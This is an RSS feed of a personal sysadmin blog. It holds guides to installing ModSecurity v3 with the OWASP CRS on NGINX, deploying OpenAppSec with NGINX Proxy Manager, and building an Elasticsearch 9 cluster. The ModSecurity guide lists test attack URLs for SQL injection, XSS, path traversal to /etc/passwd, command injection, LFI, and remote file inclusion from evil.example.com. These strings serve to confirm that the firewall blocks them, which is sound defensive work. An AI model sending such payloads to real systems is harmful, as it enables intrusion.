<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Nguyen Duc Chinh]]></title><description><![CDATA[Hi I'm Nguyen Duc Chinh.
This is where I document my daily work and learn.]]></description><link>https://chinhnd.org</link><generator>RSS for Node</generator><lastBuildDate>Thu, 16 Apr 2026 11:53:36 GMT</lastBuildDate><atom:link href="https://chinhnd.org/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Secure Your Website: A Complete Guide to Installing ModSecurity v3 and the OWASP CRS]]></title><description><![CDATA[In today's web environment, securing your applications is non-negotiable. One of the most effective ways to protect your server from common web attacks like SQL injection, XSS, and remote code execution is by implementing a Web Application Firewall (...]]></description><link>https://chinhnd.org/secure-your-website-with-modsecurity-and-owasp-crs</link><guid isPermaLink="true">https://chinhnd.org/secure-your-website-with-modsecurity-and-owasp-crs</guid><category><![CDATA[waf]]></category><category><![CDATA[modsecurity]]></category><category><![CDATA[nginx]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 23 Oct 2025 09:11:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/f5pTwLHCsAg/upload/0b73251a34646570c5bd0ca524ceb404.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In today's web environment, securing your applications is non-negotiable. One of the most effective ways to protect your server from common web attacks like SQL injection, XSS, and remote code execution is by implementing a Web Application Firewall (WAF).</p>
<p>ModSecurity is the world's most popular open-source WAF engine. When paired with the Owasp Core Rule Set (CRS), it provides a powerful and robust layer of defense.</p>
<p>This guide provides a complete, step-by-step walkthrough for compiling and installing ModSecurity v3 from scratch, integrating it with NGINX as a dynamic module, and enabling the powerful OWASP CRS on an Ubuntu server.</p>
<h1 id="heading-part-1-compiling-and-installing-the-modules-and-enabling-modsecurity-v3">Part 1 – Compiling and Installing the Modules and Enabling ModSecurity v3</h1>
<p>This guide shows the complete installation of ModSecurity v3 with NGINX and the OWASP Core Rule Set (CRS) on an Ubuntu server – including correct module paths, symlink conventions, and example tests.</p>
<h2 id="heading-1-install-dependencies">1. Install Dependencies</h2>
<p>First, let's update our server and install all the necessary build tools and libraries. This includes <code>git</code>, the build essentials, and various development libraries ModSecurity relies on.</p>
<pre><code class="lang-bash">sudo apt update
sudo apt install -y git g++ build-essential autoconf automake libtool \
  libpcre3 libpcre3-dev libpcre2-dev libxml2 libxml2-dev libyajl-dev \
  pkg-config zlib1g zlib1g-dev libcurl4-openssl-dev \
  liblua5.3-dev libgeoip-dev doxygen
</code></pre>
<h2 id="heading-2-compile-and-install-modsecurity-v3">2. Compile and Install ModSecurity v3</h2>
<p>We'll work within the <code>/usr/local/src</code> directory, a common place for building source code. We will clone the ModSecurity repository, initialize its submodules (which are required), and then run the build and installation process.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">cd</span> /usr/<span class="hljs-built_in">local</span>/src
sudo git <span class="hljs-built_in">clone</span> --depth 1 -b v3/master --single-branch https://github.com/SpiderLabs/ModSecurity
<span class="hljs-built_in">cd</span> ModSecurity
sudo git submodule init
sudo git submodule update
sudo ./build.sh
sudo ./configure
sudo make -j<span class="hljs-string">"<span class="hljs-subst">$(nproc)</span>"</span>
sudo make install
sudo apt install nginx
</code></pre>
<p>After a successful installation, ModSecurity was set up and the directory <code>/usr/local/modsecurity</code> was created, among others.</p>
<h2 id="heading-3-build-the-nginx-module">3. Build the NGINX Module</h2>
<p>Now we need the "glue" that connects NGINX to ModSecurity. This is a dynamic module that must be compiled against your <em>exact</em> running version of NGINX.</p>
<p>First, check your NGINX version:</p>
<pre><code class="lang-bash">nginx -v
</code></pre>
<p>In my case, output was:</p>
<pre><code class="lang-bash">nginx version: nginx/1.18.0 (Ubuntu)
</code></pre>
<p>Depending on that, you’ll need the NGINX source to build the ModSecurity module. In the example code, we clone ModSecurity‑nginx.git and then download the NGINX 1.24.0 source.</p>
<p>Then you build only the <code>NGINX</code> modules with <code>sudo make modules</code>.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">cd</span> /usr/<span class="hljs-built_in">local</span>/src
sudo git <span class="hljs-built_in">clone</span> https://github.com/SpiderLabs/ModSecurity-nginx.git
sudo wget http://nginx.org/download/nginx-1.18.0.tar.gz
sudo tar -xzf nginx-1.18.0.tar.gz
<span class="hljs-built_in">cd</span> nginx-1.18.0
sudo ./configure --with-compat --add-dynamic-module=/usr/<span class="hljs-built_in">local</span>/src//ModSecurity-nginx
sudo make modules
</code></pre>
<h2 id="heading-4-place-and-enable-the-module">4. Place and Enable the Module</h2>
<p>You should now be in the directory <code>/usr/local/src/nginx-1.18.0</code>.</p>
<p>Copy the created NGINX module into the modules directory, then create the file <code>mod-modsecurity.conf</code> and the symlink in <code>nginx/modules-available</code>.</p>
<p>This configuration assumes:</p>
<ul>
<li><p>existing modules are in /usr/share/nginx/modules-available</p>
</li>
<li><p>symlinks for enabled modules are in /etc/nginx/modules-enabled</p>
</li>
</ul>
<pre><code class="lang-bash">sudo cp objs/ngx_http_modsecurity_module.so /usr/lib/nginx/modules/
sudo chmod 0644 /usr/lib/nginx/modules/ngx_http_modsecurity_module.so
<span class="hljs-built_in">echo</span> <span class="hljs-string">"load_module modules/ngx_http_modsecurity_module.so;"</span> | sudo tee /usr/share/nginx/modules-available/mod-modsecurity.conf
sudo ln -s /usr/share/nginx/modules-available/mod-modsecurity.conf /etc/nginx/modules-enabled/50-modsecurity.conf
</code></pre>
<h2 id="heading-5-create-modsecurity-configuration">5. Create ModSecurity Configuration</h2>
<p>Next, create the base configuration for ModSecurity.</p>
<pre><code class="lang-bash">sudo mkdir -p /etc/nginx/modsec
<span class="hljs-built_in">cd</span> /etc/nginx/modsec
sudo cp /usr/<span class="hljs-built_in">local</span>/src/ModSecurity/modsecurity.conf-recommended ./modsecurity.conf
sudo cp /usr/<span class="hljs-built_in">local</span>/src/ModSecurity/unicode.mapping .
</code></pre>
<p>If the <code>unicode.mapping</code> file is missing, you can download it via wget:</p>
<pre><code class="lang-bash">wget https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/unicode.mapping -O /etc/nginx/modsec/unicode.mapping
</code></pre>
<h2 id="heading-6-enable-basic-rules">6. Enable Basic Rules</h2>
<p>You have just copied <code>modsecurity.conf</code> into /etc/nginx/modsec.</p>
<p>Check that the following parameters are set correctly in the file:</p>
<pre><code class="lang-bash">SecRuleEngine On
SecAuditEngine RelevantOnly
SecAuditLog /var/<span class="hljs-built_in">log</span>/modsec_audit.log
</code></pre>
<ul>
<li><p><code>SecRuleEngine On</code>: This is the master switch. It activates ModSecurity.</p>
</li>
<li><p><code>SecAuditEngine RelevantOnly</code>: This logs only requests that were either blocked or generated an error.</p>
</li>
<li><p><code>SecAuditLog</code>: This specifies where to write the audit logs.</p>
</li>
</ul>
<h2 id="heading-7-integrate-the-module-into-your-site-and-test">7. Integrate the Module into Your Site and Test</h2>
<p>Open your site’s NGINX config file in <code>/etc/nginx/sites-enabled</code></p>
<p>In the <code>server</code> block, right after <code>listen</code>, insert the following:</p>
<pre><code class="lang-bash">server {
  listen ...
  server_name ...

      <span class="hljs-comment"># activate ModSecurity</span>
    modsecurity on;
    modsecurity_rules_file /etc/nginx/modsec/modsecurity.conf;
</code></pre>
<p>Now create the file <code>/etc/nginx/modsec/modsec_test.conf</code>:</p>
<pre><code class="lang-bash">sudo nano /etc/nginx/modsec/modsec_test.conf
</code></pre>
<p>Add the following content:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># For testing purpose</span>
SecRule REQUEST_URI <span class="hljs-string">"@contains blockme"</span> <span class="hljs-string">"id:1001,phase:1,deny,status:403,msg:'Test rule triggered',chain"</span>
SecRule REQUEST_URI <span class="hljs-string">"@beginsWith /test/"</span>
</code></pre>
<p>Then edit <code>/etc/nginx/modsec/modsecurity.conf</code>:</p>
<pre><code class="lang-bash">sudo nano /etc/nginx/modsec/modsecurity.conf
</code></pre>
<p>Add this <code>Include</code> line at the end:</p>
<p>modsecurity.conf excerptInclude /etc/nginx/modsec/modsec_test.conf</p>
<pre><code class="lang-bash">Include /etc/nginx/modsec/modsec_test.conf
</code></pre>
<p>You must now reload <code>nginx</code>:</p>
<pre><code class="lang-bash">sudo nginx -t &amp;&amp; sudo systemctl reload nginx
</code></pre>
<p>From your local computer, send a test request using <code>curl</code>, or just enter the address in your web browser.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208122966/0e464253-1f30-4e28-980e-7efb4a518790.png" alt class="image--center mx-auto" /></p>
<p>If you use <code>curl</code>, the result should look similar to:</p>
<pre><code class="lang-bash">curl -i <span class="hljs-string">"http://localhost/test/?test=blockme"</span>
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 23 Oct 2025 08:29:47 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
</code></pre>
<p>The important part is <code>HTTP/2 403</code>, the HTTP status code for <strong>Forbidden</strong>, meaning the request was blocked and ModSecurity is working.</p>
<h1 id="heading-part-2-download-and-activate-the-owasp-crs">Part 2 – Download and Activate the OWASP CRS</h1>
<p>The following commands will let you download and activate the rule set. Change to the modsec directory, clone the Git repository, and create the <code>crs-setup.conf</code> file:</p>
<pre><code class="lang-bash"><span class="hljs-built_in">cd</span> /etc/nginx/modsec
sudo git <span class="hljs-built_in">clone</span> https://github.com/coreruleset/coreruleset.git

<span class="hljs-built_in">cd</span> coreruleset
sudo cp crs-setup.conf.example crs-setup.conf
</code></pre>
<p>It should download the lastest CSR to <code>/rule</code> folder:</p>
<pre><code class="lang-bash">/etc/nginx/modsec/coreruleset/rules<span class="hljs-comment"># ls</span>
asp-dotnet-errors.data                                REQUEST-944-APPLICATION-ATTACK-JAVA.conf
iis-errors.data                                       REQUEST-949-BLOCKING-EVALUATION.conf
java-classes.data                                     RESPONSE-950-DATA-LEAKAGES.conf
lfi-os-files.data                                     RESPONSE-951-DATA-LEAKAGES-SQL.conf
php-errors.data                                       RESPONSE-952-DATA-LEAKAGES-JAVA.conf
php-function-names-933150.data                        RESPONSE-953-DATA-LEAKAGES-PHP.conf
php-variables.data                                    RESPONSE-954-DATA-LEAKAGES-IIS.conf
REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example   RESPONSE-955-WEB-SHELLS.conf
REQUEST-901-INITIALIZATION.conf                       RESPONSE-956-DATA-LEAKAGES-RUBY.conf
REQUEST-905-COMMON-EXCEPTIONS.conf                    RESPONSE-959-BLOCKING-EVALUATION.conf
REQUEST-911-METHOD-ENFORCEMENT.conf                   RESPONSE-980-CORRELATION.conf
REQUEST-913-SCANNER-DETECTION.conf                    RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
REQUEST-920-PROTOCOL-ENFORCEMENT.conf                 restricted-files.data
REQUEST-921-PROTOCOL-ATTACK.conf                      restricted-upload.data
REQUEST-922-MULTIPART-ATTACK.conf                     ruby-errors.data
REQUEST-930-APPLICATION-ATTACK-LFI.conf               scanners-user-agents.data
REQUEST-931-APPLICATION-ATTACK-RFI.conf               sql-errors.data
REQUEST-932-APPLICATION-ATTACK-RCE.conf               ssrf.data
REQUEST-933-APPLICATION-ATTACK-PHP.conf               unix-shell-builtins.data
REQUEST-934-APPLICATION-ATTACK-GENERIC.conf           unix-shell.data
REQUEST-941-APPLICATION-ATTACK-XSS.conf               web-shells-asp.data
REQUEST-942-APPLICATION-ATTACK-SQLI.conf              web-shells-php.data
REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf  windows-powershell-commands.data
</code></pre>
<p>Next, include the following files in your <code>modsecurity.conf</code> file to activate the OWASP CRS:</p>
<pre><code class="lang-bash">Include /etc/nginx/modsec/coreruleset/crs-setup.conf
Include /etc/nginx/modsec/coreruleset/rules/*.conf
</code></pre>
<p>After restarting NGINX, the rule set is active:</p>
<pre><code class="lang-bash">sudo nginx -t &amp;&amp; sudo systemctl reload nginx
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf <span class="hljs-built_in">test</span> is successful
</code></pre>
<h2 id="heading-testing-the-owasp-crs">Testing the OWASP CRS</h2>
<p>The following tests can be used to verify that the rule set is working. Either enter the URL in your browser or use <code>curl</code> with the <code>-I</code> parameter.</p>
<p>SQL injection via manipulated parameter: <code>http://ip/?id=1'+or+1=1--</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208562837/ab66df9c-3cb2-44ef-a30f-13a3b00842cf.png" alt class="image--center mx-auto" /></p>
<p>Cross Site Scripting (XSS) – simple JavaScript: <code>http://ip/?search=&lt;script&gt;alert.js&lt;/script&gt;</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208682163/5d255e3c-d272-4de4-8bbd-98f79765f162.png" alt class="image--center mx-auto" /></p>
<p>Attempt to access a sensitive <code>.env</code> file: <code>http://ip/.env</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208738333/81378f09-dd9b-4679-9249-bc55192112fb.png" alt class="image--center mx-auto" /></p>
<p>Path traversal to access system files: <code>http://ip/index.php?file=../../../../etc/passwd</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208796956/dcd4820e-1dce-469f-a5f6-41d9fa0d1efe.png" alt class="image--center mx-auto" /></p>
<p>Command Injection via GET parameter: <code>http://ip/?cmd=ls%20-la</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761208886728/0927f406-4003-47f8-a88e-61c652b213c7.png" alt class="image--center mx-auto" /></p>
<p>Local File Inclusion (LFI): <code>http://ip/?testfile=../../../../etc/passwd%00</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761209542940/a29aea55-0dc2-40d6-b590-7bfd777ec6e3.png" alt class="image--center mx-auto" /></p>
<p>Remote File Inclusion (RFI): <code>http://ip/?page=http://evil.example.com/shell.txt&amp;cmd=ls</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761210171906/25646912-3b44-4713-990a-b02fa3bfb7f5.png" alt class="image--center mx-auto" /></p>
<p>If you receive 403 responses for these requests, congratulations! Your server is now protected by ModSecurity v3 and the industry-standard OWASP Core Rule Set.</p>
<h1 id="heading-your-server-is-secured-whats-next">Your Server is Secured. What's Next?</h1>
<p>Congratulations! By following this guide, you have successfully compiled ModSecurity v3 from scratch, integrated it as a dynamic NGINX module, and deployed the powerful OWASP Core Rule Set. Your web server now has a formidable, active defense against the web's most common and dangerous attacks.</p>
<p>But the journey doesn't end here. A WAF is not a "set it and forget it" tool. Your immediate next step is to <strong>monitor and tune</strong>.</p>
<ul>
<li><p><strong>Watch the Logs:</strong> Keep a close eye on your ModSecurity audit log, which we configured at <code>/var/log/modsec_audit.log</code>. This file is your best friend. It will show you exactly <em>what</em> is being blocked and <em>why</em>.</p>
</li>
<li><p><strong>Tune for False Positives:</strong> The OWASP CRS is designed to be strict, which means it might occasionally block legitimate requests from your application (known as "false positives"). By analyzing the logs, you can identify these and create custom rules to whitelist specific actions for your application, ensuring normal functionality isn't interrupted.</p>
</li>
<li><p><strong>Stay Updated:</strong> Security is a moving target. Regularly update your OWASP CRS rules by running <code>git pull</code> inside the <code>/etc/nginx/modsec/coreruleset</code> directory to protect against the latest threats.</p>
</li>
</ul>
<p>You've built a solid foundation for your web application's security. By actively monitoring and tuning your new WAF, you can maintain a robust defense that is perfectly tailored to your environment.</p>
]]></content:encoded></item><item><title><![CDATA[Secure Your Web Apps in Minutes: OpenAppSec WAF with NGINX Proxy Manager]]></title><description><![CDATA[With OpenAppSec, a modern, open-source WAF designed for simplicity and powerful, pre-emptive threat protection. When combined with the popular NGINX Proxy Manager (NPM), you get a robust, easy-to-use solution for securing your containerized applicati...]]></description><link>https://chinhnd.org/secure-your-web-apps-in-minutes-openappsec-waf-with-nginx-proxy-manager</link><guid isPermaLink="true">https://chinhnd.org/secure-your-web-apps-in-minutes-openappsec-waf-with-nginx-proxy-manager</guid><category><![CDATA[web]]></category><category><![CDATA[Security]]></category><category><![CDATA[waf]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 16 Oct 2025 10:33:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/tZc3vjPCk-Q/upload/328c83285b5cfcee2682486de1c06a27.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>With <strong>OpenAppSec</strong>, a modern, open-source WAF designed for simplicity and powerful, pre-emptive threat protection. When combined with the popular <strong>NGINX Proxy Manager (NPM)</strong>, you get a robust, easy-to-use solution for securing your containerized applications.</p>
<p>This guide will walk you through deploying OpenAppSec with NGINX Proxy Manager using Docker, all managed from the slick OpenAppSec SaaS Web UI. Let's get started!</p>
<h1 id="heading-prerequisites">Prerequisites</h1>
<p>Before we begin, ensure you have the following ready:</p>
<ul>
<li><p>A Linux server or VM with Docker and Docker Compose installed.</p>
</li>
<li><p>Internet access to pull Docker images and connect to the OpenAppSec cloud.</p>
</li>
<li><p>(Optional) A backend web application you want to protect. For this guide, we'll assume an application is running on port <code>3000</code>.</p>
</li>
<li><p><strong>Deployment Model:</strong></p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760611073979/2fbd7965-c1a7-4b84-8503-125fb80edbca.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-fetch-the-deployment-blueprint">Fetch the Deployment Blueprint</h1>
<p>Create a folder for your new open-appsec deployment and switch to that folder, e.g.</p>
<pre><code class="lang-bash">mkdir open-appsec-deployment
<span class="hljs-built_in">cd</span> ./open-appsec-deployment
</code></pre>
<p>Download the docker compose file for your desired open-appsec integration</p>
<pre><code class="lang-bash">wget https://raw.githubusercontent.com/openappsec/openappsec/main/deployment/docker-compose/nginx-proxy-manager-centrally-managed/docker-compose.yaml
</code></pre>
<p>Download the <code>.env</code> file for your desired open-appsec integration and adjust the configuration to your requirements as described below:</p>
<pre><code class="lang-bash">wget https://raw.githubusercontent.com/openappsec/openappsec/main/deployment/docker-compose/nginx-proxy-manager-centrally-managed/.env
</code></pre>
<h1 id="heading-link-your-agent-to-the-openappsec-cloud">Link Your Agent to the OpenAppSec Cloud</h1>
<p>To manage our new WAF, we need to connect it to the central management portal. This is done using a secure token:</p>
<ol>
<li><p>Navigate to the OpenAppSec Portal: <a target="_blank" href="https://my.openappsec.io/">https://my.openappsec.io/</a></p>
</li>
<li><p>Sign up for a free account or log in using your email, Google, or GitHub.</p>
</li>
<li><p>From the "Getting Started" page, follow these steps:</p>
</li>
<li><p>Check the box for "I deployed an Agent".</p>
</li>
<li><p>Click Manage and select the Docker Profile.</p>
</li>
<li><p>For the subtype, choose "NGINX Proxy Manager application security".</p>
</li>
<li><p>Click Enforce Policy.</p>
</li>
<li><p>You will now be presented with a unique management token. <strong>Copy this token.</strong></p>
</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760608476204/5b478979-6166-4311-8acf-fe59eae3fc7c.png" alt class="image--center mx-auto" /></p>
<p>Back in your server's terminal, add this token as an environment variable. This allows Docker Compose to inject it into the agent container upon startup.</p>
<p>(Remember to replace YOUR_TOKEN_HERE with the actual token you copied.)</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> TOKEN=<span class="hljs-string">"YOUR_TOKEN_HERE"</span>
</code></pre>
<h1 id="heading-launch-the-stack">Launch the Stack!</h1>
<p>With the configuration in place, it's time to bring everything online. Run the following command to start the services in detached mode (<code>-d</code>), which lets them run in the background.</p>
<pre><code class="lang-bash">docker-compose up -d
</code></pre>
<p>Docker will now pull the necessary images and start the containers. To verify that everything is running correctly, use the <code>docker ps</code> command:</p>
<pre><code class="lang-bash">docker ps -a
</code></pre>
<p>You should see an output similar to this, with the <code>appsec-agent</code> and <code>npm-centrally-managed-attachment</code> containers showing an "Up" status:</p>
<pre><code class="lang-bash">CONTAINER ID   IMAGE                                                                        COMMAND                  CREATED          STATUS          PORTS                                                                                  NAMES
5204903ec4fe   ghcr.io/openappsec/nginx-proxy-manager-centrally-managed-attachment:latest   <span class="hljs-string">"/init"</span>                  9 seconds ago    Up 6 seconds    0.0.0.0:80-81-&gt;80-81/tcp, :::80-81-&gt;80-81/tcp, 0.0.0.0:443-&gt;443/tcp, :::443-&gt;443/tcp   npm-centrally-managed-attachment
4905a185b6fd   ghcr.io/openappsec/agent:latest                                              <span class="hljs-string">"/cp-nano-agent --to…"</span>   9 seconds ago    Up 7 seconds                                                                                           appsec-agent
</code></pre>
<p>You should now see the application on the <a target="_blank" href="https://my.openappsec.io/?utm_medium=playground&amp;utm_source=instruqt&amp;utm_content=management">open-appsec Web UI</a>!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760609388653/0412fc55-3a8c-428d-83d1-d8eb86f4231e.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-configure-your-first-proxy-host">Configure Your First Proxy Host</h1>
<p>Now that the stack is running, we need to tell NGINX Proxy Manager how to route traffic to your backend application.</p>
<p>Access the NGINX Proxy Manager web portal at <code>http://&lt;your-server-ip&gt;:81</code>.</p>
<p>On your first login, you'll be prompted to create an admin user and change the password.</p>
<p><a target="_blank" href="https://play.instruqt.com/assets/tracks/qrqhoa8sdfw6/b8a6d6b9e70a1b18433ef2a4756df318/assets/image.png"><img src="https://play.instruqt.com/assets/tracks/qrqhoa8sdfw6/b8a6d6b9e70a1b18433ef2a4756df318/assets/image.png" alt="image.png" /></a></p>
<p>Click <strong>Add Proxy Host</strong>.</p>
<p>Fill in the details for your application. For example, if you have an app named <code>acmeaudit</code> running on the same Docker host:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760609194847/9f4d285b-82bd-4791-8f1c-29c0cdbec96a.png" alt class="image--center mx-auto" /></p>
<p><strong>Domain Names</strong>: <code>acmeaudit.local</code> (or your actual domain)</p>
<p><strong>Scheme</strong>: <code>http</code></p>
<p><strong>Forward Hostname / IP</strong>: <code>acmeaudit</code></p>
<p><strong>Forward Port</strong>: <code>3000</code></p>
<p>Click <strong>Save</strong>.</p>
<p>Now, you can run the following curl command again and that NGINX Proxy Manager is now serving ACME Audit application on port 80:</p>
<pre><code class="lang-bash">curl http://localhost
</code></pre>
<p>Activate Protection in the OpenAppSec Portal</p>
<p>In the <a target="_blank" href="https://my.openappsec.io/?utm_medium=playground&amp;utm_source=instruqt&amp;utm_content=management">open-appsec Web UI</a>: Create an asset defining the specific resources that open-appsec should protect, don't forget to enforce the policy afterwards. When logged in to the open-appsec portal, click on the Assets option in the top navigation menu.</p>
<p>The final and most crucial step is to enable the WAF policy for your application.</p>
<p>Return to your <strong>OpenAppSec Web UI</strong>.</p>
<p>Click on the <strong>Assets</strong> tab in the top navigation menu.</p>
<p>Click <strong>Create a new asset</strong> and fill in the details:</p>
<p><strong>Profile</strong>: Choose the Docker profile you created earlier.</p>
<p><strong>Web application URL</strong>: To protect all traffic to your site, enter <a target="_blank" href="http://*/*"><code>http://*/*</code></a>. You can make this more specific if needed.</p>
<p><a target="_blank" href="https://play.instruqt.com/assets/tracks/yu4tfhxv43ox/7621956f69a37638bb3f89e2a9e501e3/assets/image.png"><img src="https://play.instruqt.com/assets/tracks/yu4tfhxv43ox/7621956f69a37638bb3f89e2a9e501e3/assets/image.png" alt="image.png" /></a></p>
<p>Switch to the <strong>Web</strong> tab within the asset configuration.</p>
<p>Change the <strong>Threat Prevention Mode</strong> from <em>Detect</em> to <strong>Prevent</strong>. This tells the WAF to actively block malicious traffic, not just log it.</p>
<p><a target="_blank" href="https://play.instruqt.com/assets/tracks/61dt18yzccgr/2213b216630b0661bc9784b4a2f59d5a/assets/image.png"><img src="https://play.instruqt.com/assets/tracks/61dt18yzccgr/2213b216630b0661bc9784b4a2f59d5a/assets/image.png" alt="image.png" /></a></p>
<p>Click the <strong>Enforce policy</strong> button in the top right corner.</p>
<p>That's it! Your application is now actively protected by the OpenAppSec WAF. Any changes you make to the security policy in the SaaS portal will be automatically synced to your agent.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>You have successfully deployed a powerful, cloud-managed Web Application Firewall in front of your application using Docker. This combination of OpenAppSec and NGINX Proxy Manager provides a streamlined, modern, and highly effective way to manage your web security posture.</p>
<p>From here, you can explore the OpenAppSec portal to fine-tune security rules, monitor traffic, and analyze security events across all your protected assets.</p>
]]></content:encoded></item><item><title><![CDATA[Elasticsearch 9.x.x Installation and Cluster Setup]]></title><description><![CDATA[Elasticsearch is a real-time, distributed search and analytics engine—a powerful open-source tool designed for efficiently storing, searching, and analyzing large volumes of data.
Elasticsearch Installation
Installation Environment and Elasticsearch ...]]></description><link>https://chinhnd.org/elasticsearch-9xx-installation-and-cluster-setup</link><guid isPermaLink="true">https://chinhnd.org/elasticsearch-9xx-installation-and-cluster-setup</guid><category><![CDATA[elasticsearch]]></category><category><![CDATA[SIEM]]></category><category><![CDATA[kibana]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Fri, 01 Aug 2025 08:11:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/aiqKc07b5PA/upload/6deb96f212f69e3d9a29d09ff47aeaab.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Elasticsearch is a real-time, distributed search and analytics engine—a powerful open-source tool designed for efficiently storing, searching, and analyzing large volumes of data.</p>
<h1 id="heading-elasticsearch-installation"><strong>Elasticsearch Installation</strong></h1>
<h2 id="heading-installation-environment-and-elasticsearch-version"><strong>Installation Environment and Elasticsearch Version</strong></h2>
<ul>
<li><p>OS: Ubuntu 24.04 LTS</p>
</li>
<li><p>Elasticsearch: 9.1.0</p>
</li>
</ul>
<p>For cluster configuration, prepare three virtual machines (VMs) as follows:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>No.</strong></td><td><strong>host name</strong></td><td><strong>IP</strong></td></tr>
</thead>
<tbody>
<tr>
<td>#1</td><td>es-node1</td><td>192.168.234.128</td></tr>
<tr>
<td>#2</td><td>es-node2</td><td>192.168.234.129</td></tr>
<tr>
<td>#3</td><td>es-node3</td><td>192.168.234.130</td></tr>
</tbody>
</table>
</div><h2 id="heading-download-and-install-elasticsearch"><strong>Download and Install Elasticsearch</strong></h2>
<p>The Debian package for Elasticsearch 9.1.0 can be downloaded from the website and installed as follows:</p>
<pre><code class="lang-sh">wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-9.1.0-amd64.deb
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-9.1.0-amd64.deb.sha512
shasum -a 512 -c elasticsearch-9.1.0-amd64.deb.sha512
sudo dpkg -i elasticsearch-9.1.0-amd64.deb
</code></pre>
<h1 id="heading-elasticsearch-cluster-configuration"><strong>Elasticsearch Cluster Configuration</strong></h1>
<h2 id="heading-generate-amp-deploy-certificates"><strong>Generate &amp; Deploy Certificates</strong></h2>
<p>To secure inter-node communication, generate a common SSL/TLS certificates and deploy them to each node:</p>
<pre><code class="lang-plaintext">sudo /usr/share/elasticsearch/bin/elasticsearch-certutil ca
sudo /usr/share/elasticsearch/bin/elasticsearch-certutil cert --ca elastic-stack-ca.p12
</code></pre>
<p>Copy the generated <code>elastic-certificates.p12</code> file to the <code>/etc/elasticsearch/certs/</code> directory on each node:</p>
<pre><code class="lang-plaintext">sudo scp elastic-certificates.p12 root@192.168.234.129:/etc/elasticsearch/certs
sudo scp elastic-certificates.p12 root@192.168.234.130:/etc/elasticsearch/certs
</code></pre>
<h2 id="heading-configure-elasticsearchyml"><strong>Configure elasticsearch.yml</strong></h2>
<p>Assign a unique <a target="_blank" href="http://node.name"><code>node.name</code></a> for each node and add the necessary cluster settings:</p>
<pre><code class="lang-plaintext">sudo vim /etc/elasticsearch/elasticsearch.yml
</code></pre>
<p><strong>Configure on es-node1 / es-node2 / es-node3</strong></p>
<pre><code class="lang-plaintext">cluster.name: es-cluster
node.name: node-1 #Change the name on each node
network.host: 0.0.0.0

path.data: /opt/elasticsearch/data #the path ur choosing
path.logs: /opt/elasticsearch/logs #the path ur choosing

# List of cluster node IPs
discovery.seed_hosts: ["192.168.234.128", "192.168.234.129","192.168.234.130"]

# Specify master-eligible nodes for initial cluster formation (remove or comment out after initial setup)
cluster.initial_master_nodes: ["node-1", "node-2","node-3"]

# SSL/TLS settings
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.client_authentication: required
xpack.security.transport.ssl.keystore.path: elastic-certificates.p12
xpack.security.transport.ssl.truststore.path: elastic-certificates.p12
</code></pre>
<p><strong>Note:</strong> The <code>cluster.initial_master_nodes</code> setting is only necessary during the initial cluster formation. After the cluster is established, this setting should be removed or commented out. (Refer to <a target="_blank" href="https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-discovery-bootstrap-cluster.html">Bootstrapping a cluster</a>)</p>
<h1 id="heading-start-cluster-and-verify"><strong>Start Cluster and Verify</strong></h1>
<p>Start the Elasticsearch service on each node and then verify the cluster status.</p>
<p>Start the service:</p>
<pre><code class="lang-plaintext">sudo systemctl start elasticsearch
</code></pre>
<p>Reset the password for the <code>elastic</code> account:</p>
<pre><code class="lang-plaintext">sudo /usr/share/elasticsearch/bin/elasticsearch-reset-password -u elastic -i
</code></pre>
<p>Check the node status:</p>
<pre><code class="lang-plaintext">curl -u elastic:your_pass http://192.168.234.128:9200/_cat/nodes?v
==============================================================================
